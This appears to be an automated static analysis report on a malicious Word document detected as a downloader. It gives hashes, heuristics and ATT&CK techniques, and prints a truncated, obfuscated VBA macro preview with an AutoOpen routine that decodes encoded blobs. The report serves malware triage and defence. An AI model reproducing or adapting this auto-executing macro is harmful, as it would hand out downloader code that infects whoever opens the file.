Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 23e87b6ae0bc9723…

MALICIOUS

Office (OLE)

Size: 150.0 KB
Created: 2018-04-12 20:46:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: 12d707b1a4011fff49ed4e5751bc98e2
SHA-1: 0909cb5c6573934f9d109364d7fc82ef6f4129a3
SHA-256: 23e87b6ae0bc972369e9fbceff9f1dcac715ac30da760957d8e30bdbf03b3a3d
Risk score: 204

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The 'AutoOpen' subroutine and the 'Shell()' call within the VBA code indicate an attempt to execute arbitrary commands. This is a common technique for downloading and executing further malicious payloads. The ClamAV detection name 'Doc.Malware.Emodldr-10025032-0' also suggests a known downloader variant.

Heuristics 7

  • ClamAV: Doc.Malware.Emodldr-10025032-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected [medium, 2 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 38554 bytes
SHA-256: e30053f48d37fce3e755bf7edb02d75b198c444723fce845378482e10462cae7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 21 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "nBHRnrZYbmCf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case WrTjO
Case 35772
LXnwWG = 14890
nQSfX = Tan(5 - CInt(CUviZR) / IBdXp + 39892)
End Select
Application.Run KolZY + "LWmkbVVjdv" + MEzGIw, jDcZXm + HoEHwQNwfsF + UXXwoA
Select Case DVJYhl
Case 82463
wftGr = 37254
VoZaiX = Tan(5 - CInt(ZEzDl) / mQnkXr + 17339)
End Select
End Sub

Attribute VB_Name = "phbNwVEzjRuQ"
Sub CiYOW(zwFZd)
Select Case uXhrI
Case 66739
KOfHwN = 64079
AbXiI = Tan(5 - CInt(YkiPW) / aLnkI + 95491)
End Select
End Sub
Function HoEHwQNwfsF()
On Error Resume Next
Select Case WjqLW
Case 25162
sCBjqG = 65071
QJicj = Tan(5 - CInt(CwcGk) / OYVSA + 70119)
End Select
UjwGAslnU = uBNocZ("ZHX5J8MAZABmAGMANQA5AGEAOQA3ADgANwBlADAAMwAyAGMAZAAzADcANABmADkAZQBlADMANAA1ADEAYwA0ADAAYgA0ADEAYQBmAGYAYQBlADkAMAAxAGMAYQA0AGYAZQBhADMANABjADMAMAAyADgAYgBhAGIAYQA0AGQANwAxADQANgBkAGQAYQiBM", 7 + izLikW - izLikW, 180 + izLikW - izLikW)
Select Case OwZJWO
Case 36353
zpmWS = 79708
mInFfB = Tan(5 - CInt(mOFmr) / UhiiG + 31313)
End Select
Select Case njPLMH
Case 93040
POavb = 34627
zBBBf = Tan(5 - CInt(kBECuu) / zkKtw + 44302)
End Select
AwVTNbst = uBNocZ("jiADgANAA5ADIAYwBlAGIANwA3ADIANABmAGYAYgA0AGMANQBjAGMAZQBlADUAMgAzADgAMQA2ADQAZAAwADUAMwA3ADkAOQBiADMANQA4ADQAZAAxADUAOAA4ADcAYwA4ADAAZgAxADEAYQAxADcAZgBhAGUANABiADUAMgAyAGwjNCSC", 3 + LqzLN - LqzLN, 170 + LqzLN - LqzLN)
Select Case LMfAzp
Case 96303
FpOUW = 82785
BpjwB = Tan(5 - CInt(hKJSN) / DiEjzE + 52494)
End Select
Select Case SqVhIR
Case 66862
UKZkUq = 83177
jOWhtB = Tan(5 - CInt(ziojdz) / XdAYcO + 2475)
End Select
RzYuizuZa = uBNocZ("PdAYDYAZQA2AGIAMwBjADEAMwBjAGEAOQA2AGEANQBlAGQAOQA3Aiq", 5 + mVBDp - mVBDp, 48 + mVBDp - mVBDp)
Select Case TStVMZ
Case 41611
dAOCF = 63514
DDRHVw = Tan(5 - CInt(kEjqn) / kwOczG + 89656)
End Select
Select Case oXrGP
Case 86322
ampiL = 25233
ssbHmV = Tan(5 - CInt(dcCsC) / MhdwXK + 25128)
End Select
ImazHMj = uBNocZ("Um8YAMgA0AGIANQBiAGQAOQBlADgAMJ1C", 4 + oYoJi - oYoJi, 27 + oYoJi - oYoJi)
Select Case CMPRw
Case 42649
BJNSkz = 24043
ziTODK = Tan(5 - CInt(pONDzs) / rGBAw + 81672)
End Select
Select Case hLpDL
Case 90099
nHdFin = 70799
aQfQVW = Tan(5 - CInt(pFcYEA) / mzfQF + 12944)
End Select
WhTDZGp = uBNocZ("fEAZgBmADEANABjAGIAMQA1ADIANgAyADUAOABjAGMANgA2AGMAYQAyADUAMgA1AGQAOAAyADAAZQAzAGIAYQA0ADIAMQAwAGUANgA2ADQAMgA3ADYANgAwADEANQBmADQANwA1ADEAZgA2ADcAZQA5ADcAYQA5AGUANwAzADIAi4U9M82L", 2 + Lqpwic - Lqpwic, 170 + Lqpwic - Lqpwic)
Select Case LjzlA
Case 82197
MRrtA = 19565
HhrKA = Tan(5 - CInt(Wjampr) / VjZRhi + 48177)
End Select
Select Case OiGOC
Case 87383
dizawz = 58854
CwdjCI = Tan(5 - CInt(tPMGNT) / DCnhp + 93181)
End Select
acrzt = uBNocZ("w,lQBhAGIAMwBiAGEANQA0ADkAZQA1AGMANQBmADkAOABjADEAMwBhAGMAMwA4AGMAMgA2AGIAZgAzADYAZQBmADcAYwA2ADMAYQBlAGQAMAA1AGEAYwAwAGEAMgBmADgAYQBjADUANQAzADcAMQBkADkAMQA4ADUAZQA2ADEANgA4ADMANAA2AGQAMwAwADUAOA88fs", 4 + jhiUf - jhiUf, 193 + jhiUf - jhiUf)
Select Case bqFNlw
Case 71347
ZNhlQH = 23126
QNwSor = Tan(5 - CInt(wfKEb) / nOJiBb + 11751)
End Select
Select Case IZIVE
Case 8935
JonGII = 49225
RwCUf = Tan(5 - CInt(zwtoW) / jqJhb + 16312)
End Select
uZzWo = uBNocZ("Yw29qGfMAA2ADYANAAxADMAMgA0ADEAOQAyADkAMgA2ADUAOQAyADEAOAA1AGQAMABmAGMANAA0AGQAOQAxADUAYgA1AGYANAAyAGEAMgA1ADYAMwBmADQANgAxADEAMQBhAGYAZgA0ADAAZQBiAGEAYgBkADcANwBlADYAZAA2AGUAZgBlAGEANwA3ADcAMwA5AGYANwAyAZI", 8 + VQJLH - VQJLH, 197 + VQJLH - VQJLH)
Select Case GbHhv
Case 94641
izzjT = 29902
RwjhRz = Tan(5 - CInt(IaOhho) / SiGfz + 74732)
End Select
Select Case nnHBlO
Case 69930
dLnLZD = 63289
rjXOwM = Tan(5 - CInt(XdWzhG) / FiAZcG + 13920)
End Select
ifKEUb = uBNocZ("Rz4wGEAYwA0ADgAMgAxAGEAZABlADAALq4", 5 + dJQHX - dJQHX, 27 + dJQHX - dJQHX)
Select Case rTZZXT
Case 80427
iDskY = 59134
Ntbrk = Tan(5 - CInt(PQCbC) / JLzba + 4
... (truncated)